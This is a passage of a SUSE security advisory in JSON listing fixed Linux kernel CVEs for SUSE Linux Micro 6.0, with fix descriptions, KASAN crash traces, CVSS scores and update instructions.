}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53714",
"url": "https://www.suse.com/security/cve/CVE-2023-53714"
},
{
"category": "external",
"summary": "SUSE Bug 1254465 for CVE-2023-53714",
"url": "https://bugzilla.suse.com/1254465"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53714"
},
{
"cve": "CVE-2023-53743",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53743"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: Free released resource after coalescing\n\nrelease_resource() doesn\u0027t actually free the resource or resource list\nentry so free the resource list entry to avoid a leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53743",
"url": "https://www.suse.com/security/cve/CVE-2023-53743"
},
{
"category": "external",
"summary": "SUSE Bug 1254782 for CVE-2023-53743",
"url": "https://bugzilla.suse.com/1254782"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53743"
},
{
"cve": "CVE-2023-53750",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53750"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: freescale: Fix a memory out of bounds when num_configs is 1\n\nThe config passed in by pad wakeup is 1, when num_configs is 1,\nConfiguration [1] should not be fetched, which will be detected\nby KASAN as a memory out of bounds condition. Modify to get\nconfigs[1] when num_configs is 2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53750",
"url": "https://www.suse.com/security/cve/CVE-2023-53750"
},
{
"category": "external",
"summary": "SUSE Bug 1254611 for CVE-2023-53750",
"url": "https://bugzilla.suse.com/1254611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53750"
},
{
"cve": "CVE-2023-53752",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53752"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: deal with integer overflows in kmalloc_reserve()\n\nBlamed commit changed:\n ptr = kmalloc(size);\n if (ptr)\n size = ksize(ptr);\n\n size = kmalloc_size_roundup(size);\n ptr = kmalloc(size);\n\nThis allowed various crash as reported by syzbot [1]\nand Kyle Zeng.\n\nProblem is that if @size is bigger than 0x80000001,\nkmalloc_size_roundup(size) returns 2^32.\n\nkmalloc_reserve() uses a 32bit variable (obj_size),\nso 2^32 is truncated to 0.\n\nkmalloc(0) returns ZERO_SIZE_PTR which is not handled by\nskb allocations.\n\nFollowing trace can be triggered if a netdev-\u003emtu is set\nclose to 0x7fffffff\n\nWe might in the future limit netdev-\u003emtu to more sensible\nlimit (like KMALLOC_MAX_SIZE).\n\nThis patch is based on a syzbot report, and also a report\nand tentative fix from Kyle Zeng.\n\n[1]\nBUG: KASAN: user-memory-access in __build_skb_around net/core/skbuff.c:294 [inline]\nBUG: KASAN: user-memory-access in __alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527\nWrite of size 32 at addr 00000000fffffd10 by task syz-executor.4/22554\n\nCPU: 1 PID: 22554 Comm: syz-executor.4 Not tainted 6.1.39-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023\nCall trace:\ndump_backtrace+0x1c8/0x1f4 arch/arm64/kernel/stacktrace.c:279\nshow_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:286\n__dump_stack lib/dump_stack.c:88 [inline]\ndump_stack_lvl+0x120/0x1a0 lib/dump_stack.c:106\nprint_report+0xe4/0x4b4 mm/kasan/report.c:398\nkasan_report+0x150/0x1ac mm/kasan/report.c:495\nkasan_check_range+0x264/0x2a4 mm/kasan/generic.c:189\nmemset+0x40/0x70 mm/kasan/shadow.c:44\n__build_skb_around net/core/skbuff.c:294 [inline]\n__alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527\nalloc_skb include/linux/skbuff.h:1316 [inline]\nigmpv3_newpack+0x104/0x1088 net/ipv4/igmp.c:359\nadd_grec+0x81c/0x1124 net/ipv4/igmp.c:534\nigmpv3_send_cr net/ipv4/igmp.c:667 [inline]\nigmp_ifc_timer_expire+0x1b0/0x1008 net/ipv4/igmp.c:810\ncall_timer_fn+0x1c0/0x9f0 kernel/time/timer.c:1474\nexpire_timers kernel/time/timer.c:1519 [inline]\n__run_timers+0x54c/0x710 kernel/time/timer.c:1790\nrun_timer_softirq+0x28/0x4c kernel/time/timer.c:1803\n_stext+0x380/0xfbc\n____do_softirq+0x14/0x20 arch/arm64/kernel/irq.c:79\ncall_on_irq_stack+0x24/0x4c arch/arm64/kernel/entry.S:891\ndo_softirq_own_stack+0x20/0x2c arch/arm64/kernel/irq.c:84\ninvoke_softirq kernel/softirq.c:437 [inline]\n__irq_exit_rcu+0x1c0/0x4cc kernel/softirq.c:683\nirq_exit_rcu+0x14/0x78 kernel/softirq.c:695\nel0_interrupt+0x7c/0x2e0 arch/arm64/kernel/entry-common.c:717\n__el0_irq_handler_common+0x18/0x24 arch/arm64/kernel/entry-common.c:724\nel0t_64_irq_handler+0x10/0x1c arch/arm64/kernel/entry-common.c:729\nel0t_64_irq+0x1a0/0x1a4 arch/arm64/kernel/entry.S:584",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53752",
"url": "https://www.suse.com/security/cve/CVE-2023-53752"
},
{
"category": "external",
"summary": "SUSE Bug 1254613 for CVE-2023-53752",
"url": "https://bugzilla.suse.com/1254613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53752"
},
{
"cve": "CVE-2023-53759",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53759"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: hidraw: fix data race on device refcount\n\nThe hidraw_open() function increments the hidraw device reference\ncounter. The counter has no dedicated synchronization mechanism,\nresulting in a potential data race when concurrently opening a device.\n\nThe race is a regression introduced by commit 8590222e4b02 (\"HID:\nhidraw: Replace hidraw device table mutex with a rwsem\"). While\nminors_rwsem is intended to protect the hidraw_table itself, by instead\nacquiring the lock for writing, the reference counter is also protected.\nThis is symmetrical to hidraw_release().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53759",
"url": "https://www.suse.com/security/cve/CVE-2023-53759"
},
{
"category": "external",
"summary": "SUSE Bug 1254663 for CVE-2023-53759",
"url": "https://bugzilla.suse.com/1254663"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53759"
},
{
"cve": "CVE-2023-53762",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53762"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Fix UAF in hci_disconnect_all_sync\n\nUse-after-free can occur in hci_disconnect_all_sync if a connection is\ndeleted by concurrent processing of a controller event.\n\nTo prevent this the code now tries to iterate over the list backwards\nto ensure the links are cleanup before its parents, also it no longer\nrelies on a cursor, instead it always uses the last element since\nhci_abort_conn_sync is guaranteed to call hci_conn_del.\n\nUAF crash log:\n==================================================================\nBUG: KASAN: slab-use-after-free in hci_set_powered_sync\n(net/bluetooth/hci_sync.c:5424) [bluetooth]\nRead of size 8 at addr ffff888009d9c000 by task kworker/u9:0/124\n\nCPU: 0 PID: 124 Comm: kworker/u9:0 Tainted: G W\n6.5.0-rc1+ #10\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n1.16.2-1.fc38 04/01/2014\nWorkqueue: hci0 hci_cmd_sync_work [bluetooth]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x5b/0x90\n print_report+0xcf/0x670\n ? __virt_addr_valid+0xdd/0x160\n ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n kasan_report+0xa6/0xe0\n ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n ? __pfx_set_powered_sync+0x10/0x10 [bluetooth]\n hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n ? __pfx_hci_set_powered_sync+0x10/0x10 [bluetooth]\n ? __pfx_lock_release+0x10/0x10\n ? __pfx_set_powered_sync+0x10/0x10 [bluetooth]\n hci_cmd_sync_work+0x137/0x220 [bluetooth]\n process_one_work+0x526/0x9d0\n ? __pfx_process_one_work+0x10/0x10\n ? __pfx_do_raw_spin_lock+0x10/0x10\n ? mark_held_locks+0x1a/0x90\n worker_thread+0x92/0x630\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x196/0x1e0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x2c/0x50\n \u003c/TASK\u003e\n\nAllocated by task 1782:\n kasan_save_stack+0x33/0x60\n kasan_set_track+0x25/0x30\n __kasan_kmalloc+0x8f/0xa0\n hci_conn_add+0xa5/0xa80 [bluetooth]\n hci_bind_cis+0x881/0x9b0 [bluetooth]\n iso_connect_cis+0x121/0x520 [bluetooth]\n iso_sock_connect+0x3f6/0x790 [bluetooth]\n __sys_connect+0x109/0x130\n __x64_sys_connect+0x40/0x50\n do_syscall_64+0x60/0x90\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFreed by task 695:\n kasan_save_stack+0x33/0x60\n kasan_set_track+0x25/0x30\n kasan_save_free_info+0x2b/0x50\n __kasan_slab_free+0x10a/0x180\n __kmem_cache_free+0x14d/0x2e0\n device_release+0x5d/0xf0\n kobject_put+0xdf/0x270\n hci_disconn_complete_evt+0x274/0x3a0 [bluetooth]\n hci_event_packet+0x579/0x7e0 [bluetooth]\n hci_rx_work+0x287/0xaa0 [bluetooth]\n process_one_work+0x526/0x9d0\n worker_thread+0x92/0x630\n kthread+0x196/0x1e0\n ret_from_fork+0x2c/0x50\n==================================================================",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53762",
"url": "https://www.suse.com/security/cve/CVE-2023-53762"
},
{
"category": "external",
"summary": "SUSE Bug 1254606 for CVE-2023-53762",
"url": "https://bugzilla.suse.com/1254606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53762"
},
{
"cve": "CVE-2023-53766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nFS: JFS: Check for read-only mounted filesystem in txBegin\n\n This patch adds a check for read-only mounted filesystem\n in txBegin before starting a transaction potentially saving\n from NULL pointer deref.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
